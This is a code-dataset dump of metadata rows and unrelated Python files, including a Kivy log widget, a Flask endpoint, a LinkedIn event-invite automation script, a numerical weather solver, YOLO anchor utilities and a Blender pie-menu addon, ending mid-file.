seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
5818447084 | from kivy.uix.widget import Widget
from kivy.uix.label import Label
from kivy.clock import Clock
from kivy.properties import NumericProperty, ListProperty, ObjectProperty
from kivy.lang import Builder
from kivy.graphics import Color, Ellipse, Line , Rectangle, Point, GraphicException
from kivy.uix.boxlayout import BoxLayout
import io
import time
Builder.load_file("uix\consolelog\consolelog.kv")
class LogRecord (Label):
def __init__(self, *args, **kwargs):
self.createtime = time.time()
super(LogRecord, self).__init__(**kwargs)
pass
class ConsoleLog(BoxLayout):
def __init__(self, *args, **kwargs):
self.records = []
self.streampos = 0
self.maxrec = 40
self.decaytime = 60
self.orientation = 'vertical'
# Clock.schedule_interval(self.refresh, 5)
super(ConsoleLog, self).__init__(**kwargs)
def AddRecord (self, record):
line = record.strip("\n")
if line.find('DEBUG') > 0:
color = "AAAAAA"
elif line.find('INFO') > 0:
color = "AAFFAA"
elif line.find('WARN') > 0:
color = "EEEE99"
elif line.find('ERROR') > 0:
color = "FF3300"
elif line.find('CRIT') > 0:
color = "FF3300"
else:
color = "FFFFFF"
line = u"[color={}]{}[/color]".format(color,line)
label = LogRecord(text=line)
self.records.append(label)
self.add_widget(label)
return True;
def initstream (self):
self.stream = io.StringIO()
self.streampos = 0
Clock.schedule_interval(self.refresh, 0)
Clock.schedule_interval(self.checkdecay, 0.5)
return self.stream
def checkdecay (self, *args):
now = time.time()
for record in self.records:
age = now - record.createtime
if self.opacity != 0 and age > self.decaytime :
opacity = 1 - (age - self.decaytime)/100
record.opacity = opacity
if record.opacity < 0.05: self.remove_widget(record)
def refresh (self, *args):
self.stream.seek(self.streampos)
record = self.stream.readline()
if record != '' :
self.AddRecord (record)
while len(self.records) > self.maxrec:
self.remove_widget(self.records.pop(0))
self.streampos = self.stream.tell()
| aaaler/k9 | kpilot/uix/consolelog/ConsoleLog.py | ConsoleLog.py | py | 2,434 | python | en | code | 1 | github-code | 50 |
72049113436 | #!/usr/bin/python
# -*- coding: utf-8 -*-
class Business(object):
def get_business(self):
return {
'address': '1835 E Guadalupe Rd, Ste 106',
'city': 'Tempe',
'id': '--9QQLMTbFzLJ_oT-ON3Xw',
'is_open': 1,
'latitude': 33.3617,
'longitude': -111.91,
'name': 'Great Clips',
'neighborhood': '',
'postal_code': '85283',
'review_count': 9,
'stars': 3.0,
'state': 'AZ'
}
model = Business()
| Cedric-Chen/ShopMe | datamodel_test/business.py | business.py | py | 549 | python | en | code | 0 | github-code | 50 |
8213765542 | # import os
# from win32com.client import Dispatch
# import shutil
# import winreg
# from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# from selenium import webdriver
# from selenium.webdriver.common.by import By
# from selenium.webdriver.chrome.service import Service
# from selenium.webdriver.support.ui import WebDriverWait
# from datetime import datetime
# import time
# from stem import Signal
# chromedriver_path = os.path.abspath("chromedriver.exe")
# Chrome_UserData_path = os.path.join(os.getenv('LOCALAPPDATA'), 'Google\\Chrome\\User Data')
# Chrome_profile_path = os.path.abspath("Chrome_Data\\")
# Chrome_Path = None
# Range_browser_open = None
# Chrome_Data_path = os.path.abspath("Chrome_Data\\")
# def find_chrome_path():
# # Check the default installation path
# default_path = r'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'
# if os.path.isfile(default_path):
# return default_path
# default_path = r'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'
# if os.path.isfile(default_path):
# return default_path
# # Check the registry for other installation paths
# reg_path = r'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\chrome.exe'
# with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_path, 0, winreg.KEY_READ) as key:
# value = winreg.QueryValueEx(key, None)[0]
# if os.path.isfile(value):
# return value
# # Chrome not found
# return None
# def create_chrome_shortcut(Chrome_Path,no):
# # Find the Chrome executable path
# if Chrome_Path is None:
# Chrome_Path = find_chrome_path()
# # Create a Chrome profile directory
# profile_dir = os.path.join(Chrome_profile_path, 'UserProfile_{}'.format(str(no)))
# if not os.path.exists(profile_dir):
# os.makedirs(profile_dir)
# # Copy an existing Preferences file to the profile directory, chrome://version/
# preferences_file = os.path.join(Chrome_UserData_path, 'Default\\Preferences')
# if not os.path.exists(preferences_file):
# preferences_file = os.path.join(Chrome_UserData_path, 'Guest Profile\\Preferences')
# new_preferences_file = os.path.join(profile_dir, 'Preferences')
# shutil.copy(preferences_file, new_preferences_file)
# # Create the shortcut
# shortcut_path = os.path.join(Chrome_profile_path, f"ChromeShortCut_{str(no)}.lnk")
# # Check if the shortcut file exists
# if not os.path.exists(shortcut_path):
# # Create the shortcut
# import pythoncom
# # Call CoInitialize
# pythoncom.CoInitialize()
# # Your code that uses COM components goes here...
# shell = Dispatch('WScript.Shell')
# shortcut = shell.CreateShortCut(shortcut_path)
# shortcut.TargetPath = Chrome_Path
# shortcut.Arguments = "--user-data-dir=\"" + profile_dir + "\""
# shortcut.save()
# # Call CoUninitialize when you're finished with the COM components
# pythoncom.CoUninitialize()
# # Launch the shortcut
# # os.startfile(shortcut_path)
# return Chrome_Path
# def connect_driver(no):
# try:
# profile_path = os.path.join(Chrome_profile_path, 'UserProfile_{}'.format(str(no)))
# options = webdriver.ChromeOptions()
# options.add_argument("start-maximized")
# # options.add_experimental_option("excludeSwitches", ["enable-automation"])
# # options.add_experimental_option('useAutomationExtension', False)
# # options.add_experimental_option("debuggerAddress", f"localhost:{port}")
# options.add_argument('--disable-notifications')
# options.add_argument('--disable-geolocation')
# options.add_argument("--disable-features=WebUSB")
# options.add_argument("--disable-extensions")
# options.add_argument("--disable-popup-blocking")
# options.add_argument(
# 'user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36')
# options.add_argument(
# 'Accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8')
# options.add_argument('Accept-Language=en-US,en;q=0.5')
# options.add_argument('Connection=keep-alive')
# options.add_argument('Upgrade-Insecure-Requests=1')
# options.add_argument('Sec-Fetch-Dest=document')
# options.add_argument('Sec-Fetch-Mode=navigate')
# options.add_argument('Sec-Fetch-Site=none')
# options.add_argument('Sec-Fetch-User=?1')
# options.add_argument('Pragma=no-cache')
# options.add_argument('Cache-Control=no-cache')
# options.add_argument("user-data-dir=" + profile_path) # Path to your chrome profile
# ser = Service(chromedriver_path)
# driver = webdriver.Chrome(service=ser, options=options)
# wait = WebDriverWait(driver, 10)
# return driver
# except Exception as e:
# print(e)
# pass
# create_chrome_shortcut(Chrome_Path=Chrome_Path, no=1)
# browser = connect_driver(1)
# # browser.get("https://www.linkedin.com/events/gibsonreports-virtualrssevent-p6756991161354784768/")
# time.sleep(1)
import asyncio
from pyppeteer import launch
from time import sleep
async def invite_connections_to_event(event_url):
browser = await launch(executablePath='C:\Program Files\Google\Chrome\Application\chrome.exe', headless=False)
page = await browser.newPage()
await page.setViewport({'width': 1366, 'height': 1080})
# Sign in to LinkedIn
await page.goto('https://www.linkedin.com/login')
await page.waitForSelector('#username')
await page.type('#username', '*********') # Replace with your LinkedIn email
sleep(1)
await page.type('#password', '***********') # Replace with your LinkedIn password
sleep(1)
await page.click('button[type="submit"]')
await page.waitForNavigation()
sleep(2)
# Navigate to the event page
await page.goto(event_url)
await page.waitForSelector('#ember41')
# Click the "Invite" button
await page.click('button[data-control-name="invite_attendees"]')
# await page.waitForSelector('#ember41')
sleep(5)
# Select and invite the top 10 members
# invitee_selectors = await page.querySelectorAll('ember-checkbox ember-view')
# invitee_selectors = await page.querySelectorAll('.invite-modal .invitee .entity-result__title-text')
scroll_height = await page.evaluate('() => document.documentElement.scrollHeight')
viewport_height = await page.evaluate('() => window.innerHeight')
while True:
# Scroll to the bottom of the page
await page.evaluate('window.scrollTo(0, document.documentElement.scrollHeight)')
# Wait for a brief moment to allow content to load
await asyncio.sleep(1)
# Calculate the new scroll height after scrolling
new_scroll_height = await page.evaluate('() => document.documentElement.scrollHeight')
# Break the loop if the scroll height remains the same
if new_scroll_height == scroll_height:
break
scroll_height = new_scroll_height
for invitee_selector in range(1,11):
invitee_container = await page.xpath(f'/html/body/div[3]/div/div/div[2]/div/div[1]/div/div[2]/div[1]/div[2]/div/div[1]/ul/li[{invitee_selector}]')
print(invitee_container)
sleep(0.5)
if invitee_container:
invitee_checkbox = await invitee_container[0].querySelector('input[type="checkbox"]')
if invitee_checkbox:
await invitee_checkbox.click()
sleep(2)
invite = await page.xpath("/html/body/div[3]/div/div/div[2]/div/div[2]/div/button")
print(invite)
sleep(1)
await invite[0].click()
sleep(2)
# Close the invite dialog
try:
await page.click('.artdeco-modal .artdeco-modal__dismiss')
except:
pass
# Keep the browser open (comment out the next line if you want to close the browser)
await page.waitForNavigation()
# Close the browser
await browser.close()
# Usage example
event_url = 'https://www.linkedin.com/events/gibsonreports-virtualrssevent-p6756991161354784768/'
asyncio.get_event_loop().run_until_complete(invite_connections_to_event(event_url))
| jaykakadiya18/linkedin-auto | main.py | main.py | py | 8,442 | python | en | code | 0 | github-code | 50 |
22933510217 | from flask import Flask
from test import db
import json
# from gevent import pywsgi
server=Flask(__name__)
sql='SELECT * from user_message '
@server.route('/login',methods=['get'])
def login():
res= db.my_db(sql)
if res:
tinydict={'Name': '', 'Age': '', 'sex': ''}
tinydict['Name']=res[0][1]
tinydict['Age'] = res[0][3].strftime('%Y-%m-%d')
tinydict['sex'] = res[0][2]
return json.dumps(tinydict,ensure_ascii=False,indent=4)
server.run(host='127.0.0.1',port=8998,debug=True)
| 17621445641/duitang_back_end | test/user_message_get接口.py | user_message_get接口.py | py | 520 | python | en | code | 0 | github-code | 50 |
18552393261 | import cv2
import numpy as np
import xml.etree.ElementTree as ET
class Pedestrian:
def __init__(self, gt_file, extrinsics_file, intrinsics_file):
self.cont = 0
self.labels = self.read_txt(gt_file)
self.cameraMatrix, self.distCoeffs = self.read_intrinsics(intrinsics_file)
self.rvec, self.tvec = self.read_extrinsics(extrinsics_file)
self.trajectoria = []
def read_intrinsics(self, filename):
tree = ET.parse(filename)
root = tree.getroot()
camera_matrix = np.array(root.find('camera_matrix/data').text.split(), dtype='float32').reshape((3, 3))
dist_coeffs = np.array(root.find('distortion_coefficients/data').text.split(), dtype='float32').reshape(-1, 1)
return camera_matrix, dist_coeffs
def read_extrinsics(self, filename):
tree = ET.parse(filename)
root = tree.getroot()
rvec = np.array(root.find('rvec').text.split(), dtype='float32')
tvec = np.array(root.find('tvec').text.split(), dtype='float32')
return rvec, tvec
def detect(self, frame):
image_id = self.cont
if image_id in self.labels:
points_3d = []
for x, y in self.labels[image_id]:
#adiciona a terceira coordenada
points_3d.append((x, y, 0))
#projetar os pontos 3D na imagem da camera
points_2d, _ = cv2.projectPoints(np.array(points_3d, dtype='float32'), self.rvec, self.tvec, self.cameraMatrix, self.distCoeffs)
#desenha um circulo em cada posição projetada
for point in points_2d:
x, y = map(int, point.ravel())
self.trajectoria.append((x, y)) #adiciona a nova posição na trajetoria
cv2.circle(frame, (x, y), 15, (0, 255, 0), -1)
print(self.trajectoria)
self.cont += 1
return frame
def read_txt(self, filename):
labels = {}
with open(filename) as f:
for line in f:
frame_number, x, y = map(float, line.strip().split())
if int(frame_number) in labels:
labels[int(frame_number)].append((x, y))
else:
labels[int(frame_number)] = [(x, y)]
return labels
def reset_parameters(self):
self.cont = 0
self.trajectoria = [] | gabrielppierre/SAFEMAC_ui_integration | modules/detect_pedestrian.py | detect_pedestrian.py | py | 2,385 | python | en | code | 0 | github-code | 50 |
7320575331 | def check_is_looped(BR):
graph = {}
for k, it in groupby(sorted(BR), key=lambda x: x[0]):
graph[k] = {e for _, e in it}
sub_graph = {}
while True:
vertex_set = set(graph).intersection(chain.from_iterable(graph.values()))
sub_graph = {k: vertex_set & vs for k, vs in graph.items()
if k in vertex_set and vertex_set & vs}
if sub_graph == graph:
break
else:
graph = sub_graph
# If find subgraph -> self looped
if graph:
return True
else:
return False
| ArturSavchuk/decision_support | Lab1/is looped checking.py | is looped checking.py | py | 528 | python | en | code | 0 | github-code | 50 |
11172453620 | import os
import torch
import PIL.Image as Image
import matplotlib.pyplot as plt
import sys
sys.path.append("/home/ubuntu/Desktop/Domain_Adaptation_Project/repos/biastuning/")
from utils import *
results_folder_name = 'endovis18_10label_textaffine_decdertuning_4e-4_adamw_focal_alpha75e-2_gamma_2_256_bs64_rsz_manyaug_blanklables'
ious_all = {}
for object in os.listdir(results_folder_name):
ious = []
print("Starting object: ", object)
preds_path = os.path.join(results_folder_name, object, 'rescaled_preds')
gt_path = os.path.join(results_folder_name, object, 'rescaled_gt')
for i,im in enumerate(os.listdir(gt_path)):
if i<13:
continue
label = np.array(Image.open(os.path.join(gt_path,im)))[60:306,150:400]
label = (label>127)+0
pred = np.array(Image.open(os.path.join(preds_path,im)))[60:306, 150:400]
pred = (pred>127) + 0
plt.imshow(label)
plt.show()
plt.imshow(label)
plt.show()
print(label.shape)
print(pred.shape)
print(np.unique(pred))
1/0 | JayParanjape/biastuning | eval/endovis18/calculate_ious.py | calculate_ious.py | py | 1,089 | python | en | code | 26 | github-code | 50 |
29210778507 | from flask import Flask, render_template, request, flash, g
from flask_bootstrap import Bootstrap
from sqlite3 import connect, Connection
from datetime import datetime
app = Flask(__name__)
Bootstrap(app)
app.secret_key = 'development key'
from forms import ServiceRequestForm, ClientRegistrationForm
DATABASE = '../db/easydoesit.db'
# Returns a SQLite3 Connection Object
def connect_db():
return connect(DATABASE)
def close_db(connection):
connection.close()
def service_type_to_id(service_type):
"""Converts a service type string to an integer service type ID"""
db = connect_db()
if not db:
return '404'
c = db.cursor()
c.execute("""SELECT stid FROM Services WHERE type=?""", service_type)
num = c.fetchone()
db.close()
return num
@app.route("/")
def welcome():
return "Welcome to the app"
@app.route('/dispatch', methods=['GET'])
def dispatch_view():
db = connect_db()
if not db:
return "couldn't find db"
c = db.cursor()
# name, time, urgency, phone, gender_pref
c.execute("""select c.name, sr.start_time, sr.emergency_level,
c.phone_number, sr.gender_pref
FROM Clients as c JOIN ServiceRequests sr ON
c.cid = sr.cid""")
service_reqs = c.fetchall()
return render_template('service_request.html', service_requests=service_requests)
@app.route('/service_request', methods=['GET', 'POST'])
def service_request():
if request.method == 'POST':
db = connect_db()
if not db:
return '404'
params = request.get_json()
service_type_string = params['Type']
tid = service_type_to_id(service_type_string)
loc = params['DestinationLocation']
rsn = params['Reason']
name = params['Name']
gen = params['Gender']
start_time = str(datetime.now())
c = db.cursor()
c.execute("select cid from Clients where name = ?;", name)
uid = c.fetchone()
c.execute( """INSERT INTO ServiceRequests
(cid, service_type, address, start_time, emergency_level,
gender_pref) VALUES (?, ?, '?', '?', ?, '?');""", (uid, tid, loc, start_time, 2, gen))
c.execute('select * from ServiceRequests')
result = c.fetchall()
db.close()
return 'Good'
elif request.method == 'GET':
form = ServiceRequestForm()
return render_template('service_request.html', form=form)
def main():
app.run(host='0.0.0.0')
if __name__ == '__main__':
main()
| mfitton/easydoesitBB | src/app.py | app.py | py | 2,455 | python | en | code | 0 | github-code | 50 |
25770588657 | import numpy as np
import utilities as util
class TimeStepping():
def __init__(self, param):
# Initialize objects using param
self.param = param
self.mesh, self.uw, self.flux, self.boundary, self.sources = \
param.initialize_objects()
# Aliasing functions for convenience
self.apply_boundary_conditions = self.boundary.apply_boundary_conditions
self.average_solutions = self.mesh.average_solutions
self.compute_all_fluxes = self.flux.compute_all_fluxes
self.get_solutions = self.mesh.get_solution_matrices
self.save_solutions = self.mesh.save_solution_matrices_to_csv
self.set_solutions = self.mesh.set_solutions
self.source_fcn = self.sources.source_fcn
# Aliasing attributes for convenience
self.init_fcn_list = param.init_fcn_list
self.solution_setter_tuple = self.mesh.solution_setter_tuple
self.time_method = param.time_method
# Aliasing parameters
self.cell_vol_m = self.mesh.cell_vol_m
self.exact_solution_fcn_list = self.sources.exact_solution_fcn_list
self.solution_shape = (param.Nx + 2, param.Nz + 2)
self.Nt = param.Nt
self.x_ct_m, self.z_ct_m = self.mesh.x_ct_m, self.mesh.z_ct_m
# Compute common parameters
self.Dt = param.tf / param.Nt
self.inv_cell_col_m = 1.0 / self.cell_vol_m
# For showing progress and saving results
self.csv_period = self.compute_step_period(param.num_csv)
self.l2_error_period = param.l2_error_period
self.psg_period = self.compute_step_period(param.num_msg)
def compute_step_period(self, total_num):
total_num = min(total_num, self.Nt)
if total_num <= 0:
step_period = self.Nt + 1
else:
step_period = self.Nt // total_num
return step_period
def show_progress(self, step_no, prefix="=> Progress: ", end="\r"):
if step_no % self.psg_period == 0:
t = round(step_no * self.Dt, 10)
print(
prefix + "%1.2f%%, t = " % (step_no / self.Nt * 100) +
str(t) + "s ",
end=end,
)
def save_step_result_to_csv(self, step_no):
if step_no % self.csv_period != 0:
return
t = self.Dt * step_no
self.save_solutions(t=("%1.4fs" % t), theta_to_T=True)
print("Saved solutions at t = " + str(round(t, 10)) + "s. ")
def compute_l2_error(self, step_no, force=False):
def l2_norm(sol_m):
return np.sum(self.cell_vol_m * (sol_m ** 2)) ** 0.5
def l2_error(numer_sol_m, exact_sol_m):
abs_l2_error = l2_norm(sol_m=numer_sol_m - exact_sol_m)
exact_sol_norm = l2_norm(sol_m=exact_sol_m)
relative_l2_error = abs_l2_error / exact_sol_norm
return relative_l2_error, abs_l2_error, exact_sol_norm
exact_fcn_list = self.exact_solution_fcn_list
if exact_fcn_list is None:
return
if force or step_no % self.l2_error_period == 0:
t = self.Dt * step_no
xzt_tuple = (self.x_ct_m, self.z_ct_m, t)
l2_error_norm_tuple = tuple(
l2_error(
numer_sol_m=sol_m,
exact_sol_m=exact_fcn(*xzt_tuple)
)
for sol_m, exact_fcn in
zip(self.get_solutions(), exact_fcn_list)
)
rel_errors, abs_errors, l2_norms = tuple(zip(*l2_error_norm_tuple))
msg_prefix = "\nl2 errors at t = " + str(round(t, 10)) + "s:\n"
indent = " " * 4
header = indent + " " * 12 + \
"{:^10} | {:^10} | {:^10} | {:^10}\n".format(
"theta", "qv", "qc", "qp"
)
msg = msg_prefix + header + \
indent + "rel error : %1.4e | %1.4e | %1.4e | %1.4e\n" + \
indent + "abs error : %1.4e | %1.4e | %1.4e | %1.4e\n" + \
indent + "l2 norm : %1.4e | %1.4e | %1.4e | %1.4e\n"
print(msg % (rel_errors + abs_errors + l2_norms))
def save_exact_solution_to_csv(self, t):
exact_sol_matrix_list = [
exact_sol_fcn(self.x_ct_m, self.z_ct_m, t)
for exact_sol_fcn in self.exact_solution_fcn_list
]
filename_list = ["exact_theta", "exact_qv", "exact_qc", "exact_qp"]
self.mesh.save_matrices_to_csv(
matrix_list=exact_sol_matrix_list,
filename_list=filename_list,
results_folder_name="solutions",
filename_suffix=("_%1.4fs" % t),
)
def apply_initial_conditions(self):
init_fcn_list = self.param.init_fcn_list
if init_fcn_list is None:
init_fcn_list = self.exact_solution_fcn_list
if init_fcn_list is None:
raise Exception("Did not assign correct initial conditions!")
self.param.save_to_txt()
self.param.save_to_csv()
self.mesh.save_coord_matrices_to_csv()
self.mesh.apply_initial_conditions(init_fcn_list=init_fcn_list)
def compute_R(self, t):
S_tuple, V_Ts = self.source_fcn(t=t)
GG_t_tuple, GG_b_tuple, FF_r_tuple, FF_l_tuple = \
self.compute_all_fluxes(V_Ts=V_Ts)
R_tuple = tuple(
self.inv_cell_col_m * (GG_b - GG_t + FF_l - FF_r) + S
for GG_t, GG_b, FF_r, FF_l, S in zip(
GG_t_tuple, GG_b_tuple, FF_r_tuple, FF_l_tuple, S_tuple,
)
)
return R_tuple
def forward_euler(self):
Dt = self.Dt
self.apply_initial_conditions()
for step_no in range(self.Nt):
t = Dt * step_no
self.save_step_result_to_csv(step_no=step_no)
self.show_progress(step_no=step_no, end="\n")
solution_tuple = self.get_solutions()
R_tuple = self.compute_R(t)
new_solution_tuple = tuple(
sol + Dt * R
for sol, R in zip(solution_tuple, R_tuple)
)
self.apply_boundary_conditions()
self.set_solutions(*new_solution_tuple)
self.compute_l2_error(step_no=step_no + 1)
# self.save_exact_solution_to_csv(t=t)
print("\n[Final time]", end=" ")
self.compute_l2_error(step_no=self.Nt, force=True)
self.save_step_result_to_csv(step_no=self.Nt)
def runge_kutta_intermediate_step(
self, Delta_t, t, solution_copy_tuple, k_m_tuple,
):
R_tuple = self.compute_R(t)
for k_m, R in zip(k_m_tuple, R_tuple):
k_m += R
for sol_copy, R, set_sol in zip(
solution_copy_tuple, R_tuple, self.solution_setter_tuple,
):
set_sol(sol_copy + Delta_t * R)
self.apply_boundary_conditions()
def runge_kutta_final_step(self, Delta_t, t, solution_copy_tuple, k_m_tuple):
R_tuple = self.compute_R(t)
for sol_copy, R, k_m, set_sol in zip(
solution_copy_tuple, R_tuple, k_m_tuple, self.solution_setter_tuple,
):
set_sol(sol_copy + Delta_t * (k_m + R))
self.apply_boundary_conditions()
def runge_kutta_4(self):
solution_shape, Dt = self.solution_shape, self.Dt
half_Dt = 0.5 * Dt
self.apply_initial_conditions()
Delta_t_list = [half_Dt, half_Dt, Dt]
for step_no in range(self.Nt):
t = Dt * step_no
self.show_progress(step_no=step_no, end="\n")
self.save_step_result_to_csv(step_no=step_no)
# Step 0
solution_copy_tuple = tuple(
np.copy(sol_m) for sol_m in self.get_solutions()
)
k_m_tuple = tuple(np.zeros(solution_shape) for _ in range(4))
# Steps 1-3
intermediate_t_list = [t + half_Dt, t + half_Dt, t + Dt]
for Delta_t, interm_t in zip(Delta_t_list, intermediate_t_list):
self.runge_kutta_intermediate_step(
Delta_t=Delta_t,
t=interm_t,
solution_copy_tuple=solution_copy_tuple,
k_m_tuple=k_m_tuple,
)
# Step 4
self.runge_kutta_final_step(
Delta_t=Dt / 6.0,
t=t + Dt,
solution_copy_tuple=solution_copy_tuple,
k_m_tuple=k_m_tuple,
)
self.average_solutions(step_no=step_no + 1)
self.compute_l2_error(step_no=step_no + 1)
self.save_step_result_to_csv(step_no=self.Nt)
print("\n[Final time]", end=" ")
self.compute_l2_error(step_no=self.Nt, force=True)
def timestep(self):
time_method = self.param.time_method
if time_method == "forward_euler":
self.forward_euler()
elif time_method == "rk4":
self.runge_kutta_4()
else:
raise Exception("Unknown time stepping method!")
if __name__ == "__main__":
pass
| chuckjia/weather | timesteps.py | timesteps.py | py | 9,077 | python | en | code | 0 | github-code | 50 |
75057405594 | #-*-coding: utf-8-*-
class CaesarCipher:
def __init__(self, key):
self.key = int(key);
self.abc ="ABCDEFGHIJKLMNOPQRSTUVWXYZ";
def encode(self, txt):
return self.translate(txt, "e");
def decode(self, txt):
return self.translate(txt, "d");
def translate(self, txt, m):
translated = "";
txt = txt.upper();
for char in txt:
if(char not in self.abc):
translated += char;
else:
indx = self.abc.find(char);
if(m == "d"):
indx -= self.key;
else:
indx += self.key;
if(indx >= len(self.abc)):
indx %= len(self.abc);
if(indx < 0):
indx += len(self.abc);
translated += self.abc[indx];
return translated; | binarioGH/codewars | cesarclass.py | cesarclass.py | py | 667 | python | en | code | 0 | github-code | 50 |
37091507423 | from functools import reduce
def bucket_sort(items):
bucket = [[] for i in range(len(items))]
for item in items:
index = int(item * 10)
bucket[index].append(item)
for i in range(len(items)):
bucket[i] = sorted(bucket[i])
items = reduce(lambda x, y: x + y, bucket)
return items
if __name__ == "__main__":
array = [0.42, 0.32, 0.33, 0.52, 0.37, 0.47, 0.51]
print("Before sorting: ", array)
sorted_array = bucket_sort(array)
print("After sorting: ", sorted_array)
| MYTE21/DSA.Train | (3) Python - Data Structures and Algorithms/Sorting Algorithms/Bucket Sort/Bucket Sort.py | Bucket Sort.py | py | 530 | python | en | code | 2 | github-code | 50 |
36994718564 | import torch
import pkg_resources as pkg
def check_version(current: str = '0.0.0',
minimum: str = '0.0.0',
name: str = 'version ',
pinned: bool = False,
hard: bool = False,
verbose: bool = False) -> bool:
"""
Check current version against the required minimum version.
Args:
current (str): Current version.
minimum (str): Required minimum version.
name (str): Name to be used in warning message.
pinned (bool): If True, versions must match exactly. If False, minimum version must be satisfied.
hard (bool): If True, raise an AssertionError if the minimum version is not met.
verbose (bool): If True, print warning message if minimum version is not met.
Returns:
(bool): True if minimum version is met, False otherwise.
"""
current, minimum = (pkg.parse_version(x) for x in (current, minimum))
result = (current == minimum) if pinned else (current >= minimum) # bool
return result
TORCH_1_10 = check_version(torch.__version__, '1.10.0')
def make_anchors(feats, strides, grid_cell_offset=0.5):
"""Generate anchors from features."""
anchor_points, stride_tensor = [], []
assert feats is not None
dtype, device = feats[0].dtype, feats[0].device
for i, stride in enumerate(strides):
_, _, h, w = feats[i].shape
sx = torch.arange(end=w, device=device, dtype=dtype) + grid_cell_offset # shift x
sy = torch.arange(end=h, device=device, dtype=dtype) + grid_cell_offset # shift y
sy, sx = torch.meshgrid(sy, sx, indexing='ij') if TORCH_1_10 else torch.meshgrid(sy, sx)
anchor_points.append(torch.stack((sx, sy), -1).view(-1, 2))
stride_tensor.append(torch.full((h * w, 1), stride, dtype=dtype, device=device))
return torch.cat(anchor_points), torch.cat(stride_tensor)
def dist2bbox(distance, anchor_points, xywh=True, dim=-1):
"""Transform distance(ltrb) to box(xywh or xyxy)."""
lt, rb = distance.chunk(2, dim)
x1y1 = anchor_points - lt
x2y2 = anchor_points + rb
if xywh:
c_xy = (x1y1 + x2y2) / 2
wh = x2y2 - x1y1
return torch.cat((c_xy, wh), dim) # xywh bbox
return torch.cat((x1y1, x2y2), dim) # xyxy bbox
def bbox2dist(anchor_points, bbox, reg_max):
"""Transform bbox(xyxy) to dist(ltrb)."""
x1y1, x2y2 = bbox.chunk(2, -1)
return torch.cat((anchor_points - x1y1, x2y2 - anchor_points), -1).clamp_(0, reg_max - 0.01) # dist (lt, rb)
def autopad(k, p=None, d=1): # kernel, padding, dilation
"""Pad to 'same' shape outputs."""
if d > 1:
k = d * (k - 1) + 1 if isinstance(k, int) else [d * (x - 1) + 1 for x in k] # actual kernel-size
if p is None:
p = k // 2 if isinstance(k, int) else [x // 2 for x in k] # auto-pad
return p
| madara-tribe/custom-yolov8 | custom/nn/commons.py | commons.py | py | 2,883 | python | en | code | 0 | github-code | 50 |
24000692357 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
bl_info = {
"name": "Merge: Key: 'Alt M', 'F14'",
"location": "Alf M, F14",
"category": "Mesh",
}
from collections import OrderedDict
from types import MethodType
import bpy
from ..utils import addongroup
import pie_menu
class PieMenuMeshMergeAddonPreferences(
addongroup.AddonGroup, bpy.types.PropertyGroup):
bl_idname = __name__
menus = []
class Empty:
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
class MeshMerge:
idname = 'mesh_merge'
label = 'Merge'
quick_action = 'LAST'
item_order = 'CW6'
def init(self, context):
self.menu_items = []
bl_rna = bpy.ops.mesh.merge.get_rna().bl_rna
prop = bl_rna.properties['type']
icons = ['BACK', 'FORWARD' , 'ROTATECENTER', 'CURSOR',
'ROTATECOLLECTION']
for enum_item, icon in zip(prop.enum_items, icons):
item = Empty(label=enum_item.name)
item.description = enum_item.description
item.icon = icon
item.execute = "mesh.merge(type='{}')".format(enum_item.identifier)
self.menu_items.append(item)
def poll(self, context):
import bmesh
bm = bmesh.from_edit_mesh(context.active_object.data)
f = l = False
history = bm.select_history
if history:
if isinstance(history[0], bmesh.types.BMVert):
f = True
if isinstance(history[-1], bmesh.types.BMVert):
l = True
if 'FIRST' in self.execute and not f:
return False
if 'LAST' in self.execute and not l:
return False
return True
item.poll = MethodType(poll, item)
for i in range(8 - len(self.menu_items)):
self.menu_items.append(None)
PieMenuMeshMergeAddonPreferences.menus = [
MeshMerge,
]
menu_keymap_items = {
"mesh_merge": [
["Mesh", {"type": 'M', "value": 'PRESS', "alt": True}],
["Mesh", {"type": 'F14', "value": 'PRESS', "alt": True}],
],
}
classes = [
PieMenuMeshMergeAddonPreferences
]
@PieMenuMeshMergeAddonPreferences.register_addon
def register():
for cls in classes:
bpy.utils.register_class(cls)
addon_prefs = PieMenuMeshMergeAddonPreferences.get_instance()
pie_menu.register_addon(addon_prefs)
for idname, km_items in menu_keymap_items.items():
for km_name, kwargs in km_items:
km = pie_menu.get_keymap(km_name)
if km:
kmi = km.keymap_items.new("wm.pie_menu", **kwargs)
kmi.properties.menu = idname
@PieMenuMeshMergeAddonPreferences.unregister_addon
def unregister():
addon_prefs = PieMenuMeshMergeAddonPreferences.get_instance()
pie_menu.unregister_addon(addon_prefs)
for cls in classes[::-1]:
bpy.utils.unregister_class(cls)
| JT-a/blenderpython279 | scripts/addons_extern/ctools-master/piemenu/piemenu_meshmerge.py | piemenu_meshmerge.py | py | 3,776 | python | en | code | 5 | github-code | 50 |
20194608595 | from __future__ import print_function
from ExpressionValidator import ExpressionValidator
from DatasetRepository import DatasetRepository
import re
import json
class ConfigValidator:
